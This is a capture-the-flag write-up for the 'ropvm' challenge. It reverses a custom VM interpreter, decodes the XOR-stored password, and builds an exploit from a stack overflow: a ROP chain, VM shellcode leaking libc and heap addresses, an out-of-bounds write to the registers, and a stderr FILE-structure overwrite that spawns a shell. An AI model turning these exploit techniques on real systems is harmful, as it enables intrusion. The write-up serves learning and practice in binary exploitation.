Skip to content

ropvm

We are provided with an ELF binary, ropvm, and a binary file program.bin (along with some misc setup files like Dockerfile and libc).

From the name of the challenge, we can infer that the ropvm binary is the interpreter for program.bin, which contains custom VM instructions.

Running the ropvm program prompts for a password, without which we are unable to proceed.

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : shdjhsjds

[-] Wrong Password!

[EXIT] Program execution finished.

VM Reversing

Loading up ropvm in IDA, we find that the main function reads program.bin, performs some initialization, then calls sub_3A70 to start VM execution.

This is a perfect time to use a LLM, as they are excellent at understanding custom instruction set implementations (see Flareon 11).

Tossing sub_3A70 into Claude reveals some important facts about the VM:

  • Instructions are 16 bytes (4 32-bit little endian encoded integers):

    c
    struct Instruction {
        uint32_t opcode;    // Operation code
        uint32_t reg1;      // First register/operand
        uint32_t reg2;      // Second register/operand  
        uint32_t reg3;      // Third register/operand or immediate value
    };
  • The instruction set is very similar to Intel x86: alt text

  • 3 syscalls are implemented:

    alt text

  • The VM is stack based, but uses registers as well.

Next, we can ask Claude to generate a Python disassembler for the program.bin file.

This was surprisingly very successful, and disassembled all the instructions correctly.

Here's part of the disassembly of program.bin (I've renamed some labels):

asm
0010: CALL print_msg                  
0020: CALL print_msg2                  
0030: CALL read_input                  
0040: CALL check_password                  
0050: CALL exit                  
0060: HALT                           

print_msg:
0100: PUSH 0x000D                    
0110: MOV 0x000D, 0x000E             
0120: LOADI 0x0000, 1                
0130: LOADI 0x0001, 32768            
0140: LOADI 0x0002, 32784            
0150: SYSCALL                        
0160: MOV 0x000E, 0x000D             
0170: POP 0x000D                     
0180: RET

The print_msg function is responsible for printing the welcome message. The welcome string is located at memory offset 32784, and syscall 1 (printf) is used to print the message.

You might also notice that

asm
0100: PUSH 0x000D                    
0110: MOV 0x000D, 0x000E     
...
0160: MOV 0x000E, 0x000D             
0170: POP 0x000D

resembles the function prologue and epilogue that we are familiar with in x86.

Indeed, the registers 0xd and 0xe take on the roles of ebp and esp respectively (and I have renamed them as such from here onward). This will be important when we attempt to exploit the VM later.

Flag checker

Just after the print_msg function is the read_input function:

asm
read_input:
0200: push ebp                    
0210: MOV ebp, esp           
0220: LOADI 0x0000, 0                
0230: LOADI 0x0001, 61440            
0240: LOADI 0x0002, 64               
0250: SYSCALL                        
0260: MOV esp, ebp             
0270: POP ebp                     
0280: RET

64 bytes of input are read to memory offset 61440.

check_password at offset 0x1300 is the function that is responsible for validating the input:

asm
check_password:
1300: push ebp                    
1310: MOV ebp, esp           
1320: LOADI 0x0003, 0                
1330: LOADI 0x0004, 16               
1340: LOADI 0x0007, 61440            
1350: LOADI 0x0008, 33024            
1360: LOADI 0x000B, 7                
1370: LOADI 0x000C, 66               

loc_1380:
1380: ADD 0x0000, 0x0007, 0x0003     
1390: LOADR 0x0005, 0x0000           
13A0: ADD 0x0001, 0x0008, 0x0003     
13B0: LOADR 0x0006, 0x0001           
13C0: MUL 0x000A, 0x0003, 0x000B     
13D0: ADD 0x000A, 0x000A, 0x000C     
13E0: AND 0x0005, 0x0005, 0xFF       
13F0: AND 0x0006, 0x0006, 0xFF       
1400: XOR 0x0005, 0x0005, 0x000A     
1410: EQ 0x0000, 0x0005, 0x0006      
1420: JNE 0x0005, 0x0006, die   
1430: INC 0x0003                     
1440: JLT 0x0003, 0x0004, loc_1380   
1450: CALL print_correct                  
1460: CALL pwn                  
1470: CALL sub_0300                  
1480: JMP loc_14A0

This is yet another great opportunity to use Claude to help us understand all that assembly! I asked it to translate the check_password function to Python:

python
def check_password(memory):
    # Memory regions
    region1_base = 0xF000  # 61440
    region2_base = 0x8100  # 33024
    
    # Check 16 bytes
    for i in range(16):
        # Get bytes from both regions
        byte1 = memory[region1_base + i] & 0xFF
        byte2 = memory[region2_base + i] & 0xFF
        
        # Calculate XOR key: i * 7 + 66
        xor_key = ((i * 7) + 66) & 0xFF
        
        # Apply XOR to first byte and compare
        if (byte1 ^ xor_key) != byte2:
            return False
    
    return True

The password is stored at offset 0x8100, encrypted using a simple XOR algorithm. We can write a oneliner Python script to extract and decrypt the password:

python
>>> bytes((((i*7)+66)&0xff) ^ x for i,x in enumerate(open("./program.bin", "rb").read()[0x8100:][:16]))
b'V3ry53cretP4ass\n'

Entering V3ry53cretP4ass as the password prints the Correct Password! message.

But the program doesn't immediately exit. Instead, we are prompted for a second input, which is then echoed back.

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : V3ry53cretP4ass

[+] Correct Password!
Hello!
Hello!

[EXIT] Program execution finished.

Buffer overflow

The pwn function is responsible for the behavior observed above. It is called in check_password after printing the success message.

asm
pwn:
0A00: push ebp                    
0A10: MOV ebp, esp           
0A20: LOADI 0x0000, 32               
0A30: SUB esp, esp, 0x0000     
0A40: LOADI 0x0000, 0                
0A50: MOV 0x0001, esp             
0A60: LOADI 0x0002, 256              
0A70: SYSCALL                        
0A80: MOV 0x0000, esp             
0A90: MOV esp, ebp             
0AA0: POP ebp                     
0AB0: RET

This function subtracts 32 from esp, essentially allocating 32 bytes on the stack. However, 256 bytes are then read into this newly allocated stack memory, causing a buffer overflow.

Indeed, if we send in more than 32 bytes of input, we can cause a "segfault":

[INIT] VM Memory Initialized.
[RUN] Starting Virtual Machine...

== Welcome to the ROPVM ==
Password : V3ry53cretP4ass

[+] Correct Password!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[ERROR] Access violation : 0x41414141terminate called after throwing an instance of 'std::out_of_range'
  what():  [SEGFAULT]

Unfortunately for us, this is a segfault in and detected by the ropvm:

c
v3 = vm->instruction_pointer;
instruction_pointer = *v3;
if ( (unsigned int)*v3 > 0x7FFF )
{
LABEL_9:
    __printf_chk(1, "[ERROR] Access violation : %#x", instruction_pointer);
    exception = (std::out_of_range *)__cxa_allocate_exception(0x10u);
    std::out_of_range::out_of_range(exception, "[SEGFAULT]");
    __cxa_throw(
      exception,
      (struct type_info *)&`typeinfo for'std::out_of_range,
      (void (*)(void *))&std::out_of_range::~out_of_range);
}

It will require more work before we can escape the ropvm.

Ropping the VM

The first objective of the exploit will be to achieve arbitrary code execution within the ropvm. This will allow us to more easily run the instructions required to escape from the VM.

To do this, we will perform a read syscall to write to the instruction memory section of the VM memory (address < 0x7fff), then jump to that memory location. We will thus require control over registers 0, 1 and 2.

Luckily for us, POP N gadgets are readily available:

asm
0400: push ebp                    
0410: MOV ebp, esp           
0420: POP 0x0000                     
0430: MOV esp, ebp             
0440: POP ebp                     
0450: RET

Unfortunately, they aren't as clean as the pop rdi; ret; found in x86_64. If we simply jumped to 0x400, the value of ebp would be popped into register 0, which is definitely not desirable. Instead, we will jump to 0x420, but we will still need to deal with the effects of MOV esp, ebp and POP ebp.

Using gdb, I found that the address of the saved return address was 0xdff4.

Now that we know the base address of the stack, we can use the pop ebp; ret gadget to adjust the stack before each pop gadget, so that the effects of MOV esp, ebp and POP ebp are negated, and esp points to the correct location on the stack when ret is executed.

python

pop_0 = 0x420
pop_1 = 0x520
pop_rbp = 0x370
large_read = 0x1040

stack_start = 0xdff4
p.sendline("V3ry53cretP4ass")
pl = b""
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3)
pl += p32(pop_0)
pl += p32(0)
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3+4*4)
pl += p32(pop_1)
pl += p32(0x100)
pl += p32(pop_rbp)
pl += p32(stack_start + 4*3+4*4+4*3)
pl += p32(large_read)
pl += p32(0x100)
p.recvuntil(b"!\n")
p.sendline(b"A"*36+pl)

For example, after the pop 0 gadget, we want esp to point to stack_start + 4 * 4, so we set ebp to stack_start + 4 * 3 (the pop ebp instruction will do one final increment).

Luckily for us, there is a LOADI 0x0002, 32816; SYSCALL gadget at 0x1040. This eliminates the need to manually set register 2 (number of bytes to read), as any large value is sufficient.

asm
1040: LOADI 0x0002, 32816            
1050: SYSCALL                        
1060: MOV esp, ebp             
1070: POP ebp                     
1080: RET

Using this ROP chain, we write our secondary shellcode payload to 0x100, then jump to it. Before discussing the shellcode payload, let us first understand the internal implementation of the ropvm.

Implementation details

I used hrtng (and some manual editing and analysis of sub_3690) to recover the struct for the ropvm interpreter:

c
struct vm
{
  char *memory;
  char *memend;
  char *memcap;
  __int64 (*registers)[16];
  void *regend;
  void *regcap;
  unsigned __int64 *reg_ptr[9];
  __int64 *instruction_pointer;
  unsigned __int64 *esp;
  unsigned __int64 *ebp;
};

The memory and registers are implemented as C++ vectors and stored on the (real) heap. This will soon become important.

Another (also important) oddity is the fact that the register array contains 16 64-bit values. However, only the lower 32 bits can be set using the loadi and pop instructions.

Next, let's have a look at the implementation of the read and printf syscalls:

c
 case 21:
  registers_1 = (__int64 *)vm->registers;
  n3 = *registers_1;
  if ( *registers_1 )
  {
    if ( n3 == 1 )
    {
      __printf_chk(1, &memory[registers_1[1]], &memory[registers_1[2]]);
      instruction_pointer_1 = vm->instruction_pointer;
    }
    else if ( n3 == 3 )
    {
      std::__ostream_insert<char,std::char_traits<char>>(std::cout, "\n[EXIT] Program execution finished.", 35);
      // ...
      exit(0);
    }
  }
  else
  {
    read(0, &memory[registers_1[1]], *((int *)registers_1 + 4));
    instruction_pointer_1 = vm->instruction_pointer;
  }
  instruction_pointer = *instruction_pointer_1 + 16;
  *instruction_pointer_1 = instruction_pointer;
  break;

As expected, the value of register 0 is read to determine the syscall to execute. However, in the read syscall, the value of registers_1[1] is used directly to index memory. There is no type casting or bit manipulation to ensure that only the lower 32 bits of register 1 are used. Additionally, there are also no checks to ensure that only ropvm memory is accessed.

Thus, if we can control the full 64 bits of register 1, we can effectively write to any address within the program's memory, potentially overwriting important structures in libc.

Since both vm->memory and vm->registers are allocated in the heap, they are located at a constant, predictable and small offset from each other, as can be seen in gdb:

image-20250615155712722

They are only 0x90 bytes apart!

By leveraging our control over the lower 32 bits of register 1, we can perform a read syscall to write to vm->registers, controlling the full 64 bits of all registers. We can then use another read syscall to achieve arbitrary write.

Leaks

Before we exploit the arbitrary write, we will need to determine the correct offset between vm->memory and our target. Luckily for us, vm->memory is located in the heap, which is full of pointers to both the heap and libc.

Using vmmap and search-pattern in gdb, I found a suitable libc leak at offset 0x101e0 and a heap leak at offset 0x10098:

image-20250615163014099

It is crucial that offsets are calculated on the ropvm running in the provided docker container, as the offsets may vary between different libc versions. Debugging processes running in docker can be simplified using docker-dbg:

python
p, dp = docker_debug("/home/user/ropvm", "ropvm")
dp.brpt(0x3aa0)
p.interactive()

Shellcoding the VM

Now that we've got our leaks and arbitrary write, all that's left is to write some ropvm shellcode that implements our exploit.

Luckily, two instructions are sufficient:

python
def loadi(r, val):
    return p32(22)+p32(r)+p32(val)+p32(0)

def syscall():
    return p32(21)+p32(0)*3

Here's the shellcode:

python
pl2 = b""
# Leak libc
pl2 += loadi(0, 0x1)
pl2 += loadi(1, 0x101e0)
pl2 += syscall()
# Leak heap
pl2 += loadi(1, 0x10098)
pl2 += syscall()
# read(0, vm->registers, 0x20)
pl2 += loadi(0, 0x0)
pl2 += loadi(1, -0x90)
pl2 += loadi(2, 0x20)
pl2 += syscall()
# Perform arbitrary write
pl2 += syscall()
# Exit
pl2 += loadi(0, 0x3)
pl2 += syscall()
pause()
p.sendline(pl2)

The target of our arbitrary write is the well-known stderr file stream struct. By overwriting the pointers within this struct, we can execute system("sh") when the process exits and the file streams are flushed.

The exploit proceeds very similarly to any other libc leak + arbitrary write exploit:

python
leak1 = u64(p.recv(6)+b"\0\0")
libc.address = leak1 - 0x1ef0c0 - 0x28000
print(hex(libc.address))
heap_base = u64(p.recv(6)+b"\0\0") - 0x100f0
print(hex(heap_base))
p.clean()
pause()
stderr_addr = libc.sym._IO_2_1_stderr_
# here we setup the ropvm registers for the arbitrary write
pl3 = p64(0)+p64(stderr_addr - heap_base)+p64(0x1000)
p.sendline(pl3)

fs = FileStructure()
fs.flags = u64("  " + "sh".ljust(6, "\x00"))
fs._IO_write_base = 0
fs._IO_write_ptr = 1
fs._lock = stderr_addr-0x10 # Should be null
fs.chain = libc.sym.system
fs._codecvt = stderr_addr
# stderr becomes it's own wide data vtable
# Offset is so that system (fs.chain) is called
fs._wide_data = stderr_addr - 0x48
fs.vtable = libc.sym._IO_wfile_jumps
fsb = bytes(fs)
p.sendline(fsb)

And we finally get a shell:

image-20250615164342865

Appendix

program.asm
asm
010: CALL print_msg                  
0020: CALL print_msg2                  
0030: CALL read_input                  
0040: CALL check_password                  
0050: CALL exit                  
0060: HALT                           

print_msg:
0100: push ebp                    
0110: MOV ebp, esp           
0120: LOADI 0x0000, 1                
0130: LOADI 0x0001, 32768            
0140: LOADI 0x0002, 32784            
0150: SYSCALL                        
0160: MOV esp, ebp             
0170: POP ebp                     
0180: RET                            

read_input:
0200: push ebp                    
0210: MOV ebp, esp           
0220: LOADI 0x0000, 0                
0230: LOADI 0x0001, 61440            
0240: LOADI 0x0002, 64               
0250: SYSCALL                        
0260: MOV esp, ebp             
0270: POP ebp                     
0280: RET                            

sub_0300:
0300: push ebp                    
0310: MOV ebp, esp           
0320: MOV 0x0002, 0x0000             
0330: LOADI 0x0000, 1                
0340: LOADI 0x0001, 32768            
0350: SYSCALL                        
0360: MOV esp, ebp             
0370: POP ebp                     
0380: RET                            



0400: push ebp                    
0410: MOV ebp, esp           
0420: POP 0x0000                     
0430: MOV esp, ebp             
0440: POP ebp                     
0450: RET                            



0500: push ebp                    
0510: MOV ebp, esp           
0520: POP 0x0001                     
0530: MOV esp, ebp             
0540: POP ebp                     
0550: RET                            



0600: push ebp                    
0610: MOV ebp, esp           
0620: POP 0x0002                     
0630: MOV esp, ebp             
0640: POP ebp                     
0650: RET                            



0700: push ebp                    
0710: MOV ebp, esp           
0720: MUL 0x0001, 0x0000, 0x0001     
0730: MOV esp, ebp             
0740: POP ebp                     
0750: RET                            


0800: push ebp                    
0810: MOV ebp, esp           
0820: LOAD 0x0000, 0x8050            
0830: STORE 0x0000, 0x8054           
0840: MOV esp, ebp             
0850: POP ebp                     
0860: RET                            

exit:
0900: push ebp                    
0910: MOV ebp, esp           
0920: LOADI 0x0000, 3                
0930: SYSCALL                        
0940: MOV esp, ebp             
0950: POP ebp                     
0960: RET                            

pwn:
0A00: push ebp                    
0A10: MOV ebp, esp           
0A20: LOADI 0x0000, 32               
0A30: SUB esp, esp, 0x0000     
0A40: LOADI 0x0000, 0                
0A50: MOV 0x0001, esp             
0A60: LOADI 0x0002, 256              
0A70: SYSCALL                        
0A80: MOV 0x0000, esp             
0A90: MOV esp, ebp             
0AA0: POP ebp                     
0AB0: RET                            
0C00: push ebp                    
0C10: MOV ebp, esp           
0C20: POP esp                     
0C30: RET                            

print_msg2:
1000: push ebp                    
1010: MOV ebp, esp           
1020: LOADI 0x0000, 1                
1030: LOADI 0x0001, 32768            
1040: LOADI 0x0002, 32816            
1050: SYSCALL                        
1060: MOV esp, ebp             
1070: POP ebp                     
1080: RET                            

print_correct:
1100: push ebp                    
1110: MOV ebp, esp           
1120: LOADI 0x0000, 1                
1130: LOADI 0x0001, 32768            
1140: LOADI 0x0002, 32880            
1150: SYSCALL                        
1160: MOV esp, ebp             
1170: POP ebp                     
1180: RET                            

print_die:
1200: push ebp                    
1210: MOV ebp, esp           
1220: LOADI 0x0000, 1                
1230: LOADI 0x0001, 32768            
1240: LOADI 0x0002, 32848            
1250: SYSCALL                        
1260: MOV esp, ebp             
1270: POP ebp                     
1280: RET                            

check_password:
1300: push ebp                    
1310: MOV ebp, esp           
1320: LOADI 0x0003, 0                
1330: LOADI 0x0004, 16               
1340: LOADI 0x0007, 61440            
1350: LOADI 0x0008, 33024            
1360: LOADI 0x000B, 7                
1370: LOADI 0x000C, 66               

loc_1380:
1380: ADD 0x0000, 0x0007, 0x0003     
1390: LOADR 0x0005, 0x0000           
13A0: ADD 0x0001, 0x0008, 0x0003     
13B0: LOADR 0x0006, 0x0001           
13C0: MUL 0x000A, 0x0003, 0x000B     
13D0: ADD 0x000A, 0x000A, 0x000C     
13E0: AND 0x0005, 0x0005, 0xFF       
13F0: AND 0x0006, 0x0006, 0xFF       
1400: XOR 0x0005, 0x0005, 0x000A     
1410: EQ 0x0000, 0x0005, 0x0006      
1420: JNE 0x0005, 0x0006, die   
1430: INC 0x0003                     
1440: JLT 0x0003, 0x0004, loc_1380   
1450: CALL print_correct                  
1460: CALL pwn                  
1470: CALL sub_0300                  
1480: JMP loc_14A0                   

die:
1490: CALL print_die                  

loc_14A0:
14A0: MOV esp, ebp             
14B0: POP ebp                     
14C0: RET